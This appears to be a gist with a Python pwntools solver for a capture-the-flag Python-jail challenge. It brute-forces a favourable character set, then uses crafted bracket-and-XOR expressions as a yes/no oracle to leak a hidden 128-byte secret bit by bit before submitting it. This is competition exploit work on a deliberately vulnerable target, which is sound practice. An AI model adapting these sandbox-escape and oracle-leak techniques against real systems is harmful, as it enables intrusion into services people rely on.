Created
October 6, 2025 20:09
-
-
Save minaminao/a4ef6c022bf9b129e52145500476cd21 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import remote | |
| from tqdm import tqdm | |
| LOCAL = True | |
| for lucky_count in tqdm(range(5000)): | |
| print(f"trying {lucky_count=}") | |
| if LOCAL: | |
| r = remote("localhost", 5001, level="debug") | |
| else: | |
| r = remote("challs3.pyjail.club", 24908, level="debug") | |
| r.recvuntil(b"your lucky numbers are: ") | |
| lucky_numbers = r.recvline().strip().split(b", ") | |
| lucky_numbers = sorted([chr(int(x)) for x in lucky_numbers]) | |
| print(f"{lucky_numbers=}") | |
| if lucky_numbers != [">", "[", "]", "^"]: | |
| r.close() | |
| continue | |
| for count in range(2 if LOCAL else 100): | |
| r.recvuntil(b"cmd: ") | |
| def bulk_query(codes: list[str]) -> list[bool]: | |
| rs = [] | |
| for code in codes: | |
| r.sendline(code.encode()) | |
| res = r.recvuntil(b"cmd: ") | |
| rs.append(b"broke" not in res) | |
| return rs | |
| payloads = { | |
| 0: "[_>_][_>_]", | |
| 1: "[_[_>_]>[_>_][_>_]][_>_]", | |
| } | |
| def get_code(index: int) -> str: | |
| bit_index = index % 8 | |
| byte_index = index // 8 | |
| assert byte_index in payloads | |
| index_code = f"[_[{payloads[byte_index]}]{('>>' + payloads[1])*bit_index}][_>_]" | |
| code = f"[[]][{index_code}^{payloads[1]}>{index_code}]" | |
| return code | |
| recovered = [None] * 128 | |
| res = bulk_query([get_code(0), get_code(1), get_code(2), get_code(3), get_code(4), get_code(5), get_code(6), get_code(7)]) | |
| recovered[0] = sum((1 << i) for i, b in enumerate(res) if b) | |
| payloads[recovered[0]] = f"_[{payloads[0]}]" | |
| res = bulk_query([get_code(8), get_code(9), get_code(10), get_code(11), get_code(12), get_code(13), get_code(14), get_code(15)]) | |
| recovered[1] = sum((1 << i) for i, b in enumerate(res) if b) | |
| payloads[recovered[1]] = f"_[{payloads[1]}]" | |
| print(recovered) | |
| def expand_payloads() -> None: | |
| global payloads | |
| while True: | |
| keys_num = len(payloads) | |
| for byte, value in enumerate(recovered): | |
| if value is None: | |
| continue | |
| tmp = f"_[{payloads[byte]}]" | |
| while value > 0: | |
| if value not in payloads: | |
| payloads[value] = f"[{tmp}][_>_]" | |
| tmp = f"{tmp}>>{payloads[1]}" | |
| value = value >> 1 | |
| for x in list(payloads.keys()): | |
| for y in list(payloads.keys()): | |
| value = x ^ y | |
| if value not in payloads: | |
| payloads[value] = f"[{payloads[x]}^{payloads[y]}][_>_]" | |
| if len(payloads) == keys_num: | |
| break | |
| while True: | |
| changed = False | |
| expand_payloads() | |
| for byte, value in enumerate(recovered): | |
| if value is not None: | |
| continue | |
| if byte not in payloads: | |
| continue | |
| changed = True | |
| res = bulk_query([get_code(8 * byte + i) for i in range(8)]) | |
| recovered[byte] = sum((1 << i) for i, b in enumerate(res) if b) | |
| payloads[recovered[byte]] = f"_[{payloads[byte]}]" | |
| print(recovered) | |
| if not changed: | |
| break | |
| r.sendline(b"submit") | |
| r.recvuntil(b"lottery numbers? ") | |
| r.sendline("".join(f"{x:02x}" for x in recovered).encode()) | |
| print(r.recv()) | |
| break |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment